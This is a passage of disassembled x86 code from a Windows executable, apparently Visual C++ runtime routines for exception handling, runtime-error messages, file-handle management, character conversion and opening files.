sub_41D4EF endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6A4 proc near ; DATA XREF: .text:00417B22�o
; sub_41AF25+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41D744
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41D6D7: ; CODE XREF: sub_41D6A4+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41D73D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41D72B
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41D72B
js short loc_41D736
mov edi, [ebx+8]
push ebx
call sub_416200
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_416242
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_4162D6
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41D72B: ; CODE XREF: sub_41D6A4+40�j
; sub_41D6A4+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41D6D7
; ---------------------------------------------------------------------------
loc_41D736: ; CODE XREF: sub_41D6A4+54�j
mov eax, 0
jmp short loc_41D759
; ---------------------------------------------------------------------------
loc_41D73D: ; CODE XREF: sub_41D6A4+36�j
mov eax, 1
jmp short loc_41D759
; ---------------------------------------------------------------------------
loc_41D744: ; CODE XREF: sub_41D6A4+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_416242
add esp, 8
pop ebp
mov eax, 1
loc_41D759: ; CODE XREF: sub_41D6A4+97�j
; sub_41D6A4+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D6A4 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_416242
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41D77C proc near ; CODE XREF: sub_417C0E+9�p
; sub_417C33+9�p
mov eax, dword_46BB58
cmp eax, 1
jz short loc_41D793
test eax, eax
jnz short locret_41D7B4
cmp dword_4383E4, 1
jnz short locret_41D7B4
loc_41D793: ; CODE XREF: sub_41D77C+8�j
push 0FCh
call sub_41D7B5
mov eax, dword_46BCC4
pop ecx
test eax, eax
jz short loc_41D7A9
call eax
loc_41D7A9: ; CODE XREF: sub_41D77C+29�j
push 0FFh
call sub_41D7B5
pop ecx
locret_41D7B4: ; CODE XREF: sub_41D77C+C�j
; sub_41D77C+15�j
retn
sub_41D77C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D7B5 proc near ; CODE XREF: sub_417C0E+12�p
; sub_417C33+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_43AA78
loc_41D7C8: ; CODE XREF: sub_41D7B5+20�j
cmp edx, [eax]
jz short loc_41D7D7
add eax, 8
inc ecx
cmp eax, offset off_43AB08
jl short loc_41D7C8
loc_41D7D7: ; CODE XREF: sub_41D7B5+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_43AA78[esi]
jnz loc_41D905
mov eax, dword_46BB58
cmp eax, 1
jz loc_41D8DF
test eax, eax
jnz short loc_41D808
cmp dword_4383E4, 1
jz loc_41D8DF
loc_41D808: ; CODE XREF: sub_41D7B5+44�j
cmp edx, 0FCh
jz loc_41D905
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_42107C ; GetModuleFileNameA
test eax, eax
jnz short loc_41D83F
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_415A20
pop ecx
pop ecx
loc_41D83F: ; CODE XREF: sub_41D7B5+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_415B10
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41D882
lea eax, [ebp+var_1A4]
push eax
call sub_415B10
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_416BE0
add esp, 10h
loc_41D882: ; CODE XREF: sub_41D7B5+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_415A20
lea eax, [ebp+var_A0]
push edi
push eax
call sub_415A30
lea eax, [ebp+var_A0]
push offset asc_421B70 ; "\n\n"
push eax
call sub_415A30
push off_43AA7C[esi]
lea eax, [ebp+var_A0]
push eax
call sub_415A30
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_41EF8E
add esp, 2Ch
pop edi
jmp short loc_41D905
; ---------------------------------------------------------------------------
loc_41D8DF: ; CODE XREF: sub_41D7B5+3C�j
; sub_41D7B5+4D�j
lea eax, [ebp+arg_0]
lea esi, off_43AA7C[esi]
push 0
push eax
push dword ptr [esi]
call sub_415B10
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_421034 ; GetStdHandle
push eax
call dword_421070 ; WriteFile
loc_41D905: ; CODE XREF: sub_41D7B5+2E�j
; sub_41D7B5+59�j ...
pop esi
leave
retn
sub_41D7B5 endp
; =============== S U B R O U T I N E =======================================
sub_41D908 proc near ; CODE XREF: sub_417C57+6C�p
; sub_41C178+32�p ...
arg_0 = dword ptr 4
inc dword_46BCC8
push 1000h
call sub_415BE9
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_41D931
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41D942
; ---------------------------------------------------------------------------
loc_41D931: ; CODE XREF: sub_41D908+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41D942: ; CODE XREF: sub_41D908+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41D908 endp
; =============== S U B R O U T I N E =======================================
sub_41D94C proc near ; CODE XREF: sub_417C57+61�p
; sub_4187D6+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_46CF20
jb short loc_41D95B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41D95B: ; CODE XREF: sub_41D94C+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_46CE20[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_41D94C endp
; =============== S U B R O U T I N E =======================================
sub_41D972 proc near ; DATA XREF: .text:00423020�o
mov eax, dword_46CE00
push esi
push 14h
test eax, eax
pop esi
jnz short loc_41D986
mov eax, 200h
jmp short loc_41D98C
; ---------------------------------------------------------------------------
loc_41D986: ; CODE XREF: sub_41D972+B�j
cmp eax, esi
jge short loc_41D991
mov eax, esi
loc_41D98C: ; CODE XREF: sub_41D972+12�j
mov dword_46CE00, eax
loc_41D991: ; CODE XREF: sub_41D972+16�j
push 4
push eax
call sub_41F017
pop ecx
mov dword_46BDF8, eax
test eax, eax
pop ecx
jnz short loc_41D9C5
push 4
push esi
mov dword_46CE00, esi
call sub_41F017
pop ecx
mov dword_46BDF8, eax
test eax, eax
pop ecx
jnz short loc_41D9C5
push 1Ah
call sub_417C0E
pop ecx
loc_41D9C5: ; CODE XREF: sub_41D972+30�j
; sub_41D972+49�j
xor ecx, ecx
mov eax, offset off_43AB08
loc_41D9CC: ; CODE XREF: sub_41D972+6E�j
mov edx, dword_46BDF8
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_43AD88
jl short loc_41D9CC
xor edx, edx
mov ecx, offset dword_43AB18
loc_41D9E9: ; CODE XREF: sub_41D972+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword_46CE20[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_41DA06
test eax, eax
jnz short loc_41DA09
loc_41DA06: ; CODE XREF: sub_41D972+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41DA09: ; CODE XREF: sub_41D972+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_43AB78
jl short loc_41D9E9
pop esi
retn
sub_41D972 endp
; =============== S U B R O U T I N E =======================================
sub_41DA17 proc near ; DATA XREF: .text:00423030�o
; FUNCTION CHUNK AT 0041F0C8 SIZE 00000058 BYTES
call sub_418760
cmp byte_46BB44, 0
jz short locret_41DA2A
jmp loc_41F0C8
; ---------------------------------------------------------------------------
locret_41DA2A: ; CODE XREF: sub_41DA17+C�j
retn
sub_41DA17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA2B proc near ; CODE XREF: sub_417D6C+2D4�p
; sub_417D6C+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_41DA37
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41DA37: ; CODE XREF: sub_41DA2B+8�j
cmp dword_46BB9C, 0
jnz short loc_41DA52
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_41DA84
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41DA52: ; CODE XREF: sub_41DA2B+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_4385FC
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_46BBAC
call dword_421138 ; WideCharToMultiByte
test eax, eax
jz short loc_41DA84
cmp [ebp+arg_0], 0
jz short loc_41DA91
loc_41DA84: ; CODE XREF: sub_41DA2B+1E�j
; sub_41DA2B+51�j
mov dword_46BB04, 2Ah
or eax, 0FFFFFFFFh
loc_41DA91: ; CODE XREF: sub_41DA2B+57�j
pop ebp
retn
sub_41DA2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DA93 proc near ; CODE XREF: sub_418576+5E�p
; sub_41CA9C+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421BB0
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword_46BCCC
xor ebx, ebx
cmp eax, ebx
jnz short loc_41DB02
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4218A0
push esi
call dword_421028 ; GetStringTypeW
test eax, eax
jz short loc_41DAE0
mov eax, esi
jmp short loc_41DAFD
; ---------------------------------------------------------------------------
loc_41DAE0: ; CODE XREF: sub_41DA93+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_43B668
push esi
push ebx
call dword_42102C ; GetStringTypeA
test eax, eax
jz loc_41DBC8
push 2
pop eax
loc_41DAFD: ; CODE XREF: sub_41DA93+4B�j
mov dword_46BCCC, eax
loc_41DB02: ; CODE XREF: sub_41DA93+2F�j
cmp eax, 2
jnz short loc_41DB2B
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_41DB13
mov eax, dword_46BB9C
loc_41DB13: ; CODE XREF: sub_41DA93+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_42102C ; GetStringTypeA
jmp loc_41DBCA
; ---------------------------------------------------------------------------
loc_41DB2B: ; CODE XREF: sub_41DA93+72�j
cmp eax, 1
jnz loc_41DBC8
cmp [ebp+arg_10], ebx
jnz short loc_41DB41
mov eax, dword_46BBAC
mov [ebp+arg_10], eax
loc_41DB41: ; CODE XREF: sub_41DA93+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_421064 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41DBC8
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_415B90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_415390
add esp, 0Ch
jmp short loc_41DB97
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_41DB97: ; CODE XREF: sub_41DA93+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_41DBC8
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_421064 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_41DBC8
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_421028 ; GetStringTypeW
jmp short loc_41DBCA
; ---------------------------------------------------------------------------
loc_41DBC8: ; CODE XREF: sub_41DA93+61�j
; sub_41DA93+9B�j ...
xor eax, eax
loc_41DBCA: ; CODE XREF: sub_41DA93+93�j
; sub_41DA93+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41DA93 endp
; =============== S U B R O U T I N E =======================================
sub_41DBDC proc near ; CODE XREF: sub_41DDF6:loc_41DF6E�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_46CE20
loc_41DBEB: ; CODE XREF: sub_41DBDC+48�j
mov eax, [ecx]
test eax, eax
jz short loc_41DC28
lea edx, [eax+100h]
loc_41DBF7: ; CODE XREF: sub_41DBDC+28�j
cmp eax, edx
jnb short loc_41DC17
test byte ptr [eax+4], 1
jz short loc_41DC06
add eax, 8
jmp short loc_41DBF7
; ---------------------------------------------------------------------------
loc_41DC06: ; CODE XREF: sub_41DBDC+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41DC6B
loc_41DC17: ; CODE XREF: sub_41DBDC+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_46CF20
jl short loc_41DBEB
jmp short loc_41DC6B
; ---------------------------------------------------------------------------
loc_41DC28: ; CODE XREF: sub_41DBDC+13�j
mov esi, 100h
push esi
call sub_415BE9
test eax, eax
pop ecx
jz short loc_41DC6B
add dword_46CF20, 20h
lea ecx, ds:46CE20h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41DC4E: ; CODE XREF: sub_41DBDC+88�j
cmp eax, edx
jnb short loc_41DC66
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41DC4E
; ---------------------------------------------------------------------------
loc_41DC66: ; CODE XREF: sub_41DBDC+74�j
shl edi, 5
mov ebx, edi
loc_41DC6B: ; CODE XREF: sub_41DBDC+39�j
; sub_41DBDC+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41DBDC endp
; =============== S U B R O U T I N E =======================================
sub_41DC71 proc near ; CODE XREF: sub_41DDF6+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, dword_46CF20
push edi
jnb short loc_41DCD1
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:46CE20h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_41DCD1
cmp dword_4383E4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41DCC7
sub eax, 0
jz short loc_41DCBE
dec eax
jz short loc_41DCB9
dec eax
jnz short loc_41DCC7
push ebx
push 0FFFFFFF4h
jmp short loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DCB9: ; CODE XREF: sub_41DC71+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_41DCC1
; ---------------------------------------------------------------------------
loc_41DCBE: ; CODE XREF: sub_41DC71+3B�j
push ebx
push 0FFFFFFF6h
loc_41DCC1: ; CODE XREF: sub_41DC71+46�j
; sub_41DC71+4B�j
call dword_421024 ; SetStdHandle
loc_41DCC7: ; CODE XREF: sub_41DC71+36�j
; sub_41DC71+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_41DCE5
; ---------------------------------------------------------------------------
loc_41DCD1: ; CODE XREF: sub_41DC71+C�j
; sub_41DC71+28�j
and dword_46BB08, 0
mov dword_46BB04, 9
or eax, 0FFFFFFFFh
loc_41DCE5: ; CODE XREF: sub_41DC71+5E�j
pop edi
pop esi
retn
sub_41DC71 endp
; =============== S U B R O U T I N E =======================================
sub_41DCE8 proc near ; CODE XREF: sub_4185EB+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, dword_46CF20
push edi
jnb short loc_41DD4B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:46CE20h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41DD4B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41DD4B
cmp dword_4383E4, 1
jnz short loc_41DD41
xor eax, eax
sub ecx, eax
jz short loc_41DD38
dec ecx
jz short loc_41DD33
dec ecx
jnz short loc_41DD41
push eax
push 0FFFFFFF4h
jmp short loc_41DD3B
; ---------------------------------------------------------------------------
loc_41DD33: ; CODE XREF: sub_41DCE8+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41DD3B
; ---------------------------------------------------------------------------
loc_41DD38: ; CODE XREF: sub_41DCE8+3E�j
push eax
push 0FFFFFFF6h
loc_41DD3B: ; CODE XREF: sub_41DCE8+49�j
; sub_41DCE8+4E�j
call dword_421024 ; SetStdHandle
loc_41DD41: ; CODE XREF: sub_41DCE8+38�j
; sub_41DCE8+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_41DD5F
; ---------------------------------------------------------------------------
loc_41DD4B: ; CODE XREF: sub_41DCE8+C�j
; sub_41DCE8+2A�j ...
and dword_46BB08, 0
mov dword_46BB04, 9
or eax, 0FFFFFFFFh
loc_41DD5F: ; CODE XREF: sub_41DCE8+61�j
pop edi
pop esi
retn
sub_41DCE8 endp
; =============== S U B R O U T I N E =======================================
sub_41DD62 proc near ; CODE XREF: sub_4185EB+32�p
; sub_4185EB+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_46CF20
jnb short loc_41DD8A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_46CE20[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41DD8A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41DD8A: ; CODE XREF: sub_41DD62+A�j
; sub_41DD62+23�j
and dword_46BB08, 0
mov dword_46BB04, 9
or eax, 0FFFFFFFFh
retn
sub_41DD62 endp
; =============== S U B R O U T I N E =======================================
sub_41DD9F proc near ; CODE XREF: sub_4186C9+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_46CF20
jnb short loc_41DDE8
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, dword_46CE20[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_41DDE8
push eax
call sub_41DD62
pop ecx
push eax
call dword_421020 ; FlushFileBuffers
test eax, eax
jnz short loc_41DDDD
call dword_421088 ; RtlGetLastWin32Error
jmp short loc_41DDDF
; ---------------------------------------------------------------------------
loc_41DDDD: ; CODE XREF: sub_41DD9F+34�j
xor eax, eax
loc_41DDDF: ; CODE XREF: sub_41DD9F+3C�j
test eax, eax
jz short locret_41DDF5
mov dword_46BB08, eax
loc_41DDE8: ; CODE XREF: sub_41DD9F+A�j
; sub_41DD9F+22�j
mov dword_46BB04, 9
or eax, 0FFFFFFFFh
locret_41DDF5: ; CODE XREF: sub_41DD9F+42�j
retn
sub_41DD9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDF6 proc near ; CODE XREF: sub_4188A0+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41DE1C
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_41DE27
; ---------------------------------------------------------------------------
loc_41DE1C: ; CODE XREF: sub_41DDF6+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41DE27: ; CODE XREF: sub_41DDF6+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_41DE41
test ch, 40h
jnz short loc_41DE3D
cmp dword_46BDD8, eax
jz short loc_41DE41
loc_41DE3D: ; CODE XREF: sub_41DDF6+3D�j
or [ebp+var_1], 80h
loc_41DE41: ; CODE XREF: sub_41DDF6+38�j
; sub_41DDF6+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_41DE79
dec eax
jz short loc_41DE70
dec eax
jz short loc_41DE67
loc_41DE52: ; CODE XREF: sub_41DDF6+9F�j
; sub_41DDF6+E8�j ...
mov dword_46BB04, 16h
mov dword_46BB08, ebx
jmp loc_41E08C
; ---------------------------------------------------------------------------
loc_41DE67: ; CODE XREF: sub_41DDF6+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_41DE80
; ---------------------------------------------------------------------------
loc_41DE70: ; CODE XREF: sub_41DDF6+57�j
mov [ebp+var_C], 40000000h
jmp short loc_41DE80
; ---------------------------------------------------------------------------
loc_41DE79: ; CODE XREF: sub_41DDF6+54�j
mov [ebp+var_C], 80000000h
loc_41DE80: ; CODE XREF: sub_41DDF6+78�j
; sub_41DDF6+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41DEAE
cmp eax, 20h
jz short loc_41DEA5
cmp eax, 30h
jz short loc_41DE9C
cmp eax, 40h
jnz short loc_41DE52
mov [ebp+var_10], esi
jmp short loc_41DEB1
; ---------------------------------------------------------------------------
loc_41DE9C: ; CODE XREF: sub_41DDF6+9A�j
mov [ebp+var_10], 2
jmp short loc_41DEB1
; ---------------------------------------------------------------------------
loc_41DEA5: ; CODE XREF: sub_41DDF6+95�j
mov [ebp+var_10], 1
jmp short loc_41DEB1
; ---------------------------------------------------------------------------
loc_41DEAE: ; CODE XREF: sub_41DDF6+90�j
mov [ebp+var_10], ebx
loc_41DEB1: ; CODE XREF: sub_41DDF6+A4�j
; sub_41DDF6+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_41DEFB
jz short loc_41DEF6
cmp ecx, ebx
jz short loc_41DEF6
cmp ecx, edi
jz short loc_41DEED
cmp ecx, 200h
jz short loc_41DF14
cmp ecx, 300h
jnz loc_41DE52
mov [ebp+var_8], 2
jmp short loc_41DF24
; ---------------------------------------------------------------------------
loc_41DEED: ; CODE XREF: sub_41DDF6+D8�j
mov [ebp+var_8], 4
jmp short loc_41DF24
; ---------------------------------------------------------------------------
loc_41DEF6: ; CODE XREF: sub_41DDF6+D0�j
; sub_41DDF6+D4�j
mov [ebp+var_8], esi
jmp short loc_41DF24
; ---------------------------------------------------------------------------
loc_41DEFB: ; CODE XREF: sub_41DDF6+CE�j
cmp ecx, 500h
jz short loc_41DF1D
cmp ecx, 600h
jz short loc_41DF14
cmp ecx, edx
jz short loc_41DF1D
jmp loc_41DE52
; ---------------------------------------------------------------------------
loc_41DF14: ; CODE XREF: sub_41DDF6+E0�j
; sub_41DDF6+113�j
mov [ebp+var_8], 5
jmp short loc_41DF24
; ---------------------------------------------------------------------------
loc_41DF1D: ; CODE XREF: sub_41DDF6+10B�j
; sub_41DDF6+117�j
mov [ebp+var_8], 1
loc_41DF24: ; CODE XREF: sub_41DDF6+F5�j
; sub_41DDF6+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_41DF43
mov ecx, dword_46BB0C
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_41DF43
push 1
pop esi
loc_41DF43: ; CODE XREF: sub_41DDF6+138�j
; sub_41DDF6+148�j
test al, 40h
jz short loc_41DF51
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_41DF51: ; CODE XREF: sub_41DDF6+14F�j
test ah, 10h
jz short loc_41DF58
or esi, edi
loc_41DF58: ; CODE XREF: sub_41DDF6+15E�j
test al, 20h
jz short loc_41DF64
or esi, 8000000h
jmp short loc_41DF6E
; ---------------------------------------------------------------------------
loc_41DF64: ; CODE XREF: sub_41DDF6+164�j
test al, 10h
jz short loc_41DF6E
or esi, 10000000h
loc_41DF6E: ; CODE XREF: sub_41DDF6+16C�j
; sub_41DDF6+170�j
call sub_41DBDC
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_41DF8F
and dword_46BB08, 0
mov dword_46BB04, 18h
jmp short loc_41DFCD
; ---------------------------------------------------------------------------
loc_41DF8F: ; CODE XREF: sub_41DDF6+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call dword_421078 ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_41DFC0
push esi
call dword_421030 ; GetFileType
test eax, eax
jnz short loc_41DFD4
push esi
call dword_42106C ; CloseHandle
loc_41DFC0: ; CODE XREF: sub_41DDF6+1B6�j
call dword_421088 ; RtlGetLastWin32Error
push eax
call sub_41CE74
pop ecx
loc_41DFCD: ; CODE XREF: sub_41DDF6+197�j
mov eax, edi
jmp loc_41E0AA
; ---------------------------------------------------------------------------
loc_41DFD4: ; CODE XREF: sub_41DDF6+1C1�j
cmp eax, 2
jnz short loc_41DFDF
or [ebp+var_1], 40h
jmp short loc_41DFE8
; ---------------------------------------------------------------------------
loc_41DFDF: ; CODE XREF: sub_41DDF6+1E1�j
cmp eax, 3
jnz short loc_41DFE8
or [ebp+var_1], 8
loc_41DFE8: ; CODE XREF: sub_41DDF6+1E7�j
; sub_41DDF6+1EC�j
push esi
push ebx
call sub_41DC71
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:46CE20h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_41E091
test al, 80h
jz short loc_41E091
test byte ptr [ebp+arg_4], 2
jz short loc_41E091
push 2
push 0FFFFFFFFh
push ebx
call sub_41C447
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41E046
cmp dword_46BB08, 83h
jz short loc_41E091
jmp short loc_41E085
; ---------------------------------------------------------------------------
loc_41E046: ; CODE XREF: sub_41DDF6+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41C251
add esp, 0Ch
test eax, eax
jnz short loc_41E073
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_41E073
push [ebp+var_10]
push ebx
call sub_41F120
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E085
loc_41E073: ; CODE XREF: sub_41DDF6+265�j
; sub_41DDF6+26B�j
push 0
push 0
push ebx
call sub_41C447
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41E091
loc_41E085: ; CODE XREF: sub_41DDF6+24E�j
; sub_41DDF6+27B�j
push ebx
call sub_4185EB
pop ecx
loc_41E08C: ; CODE XREF: sub_41DDF6+6C�j
or eax, 0FFFFFFFFh
jmp short loc_41E0AA
; ---------------------------------------------------------------------------
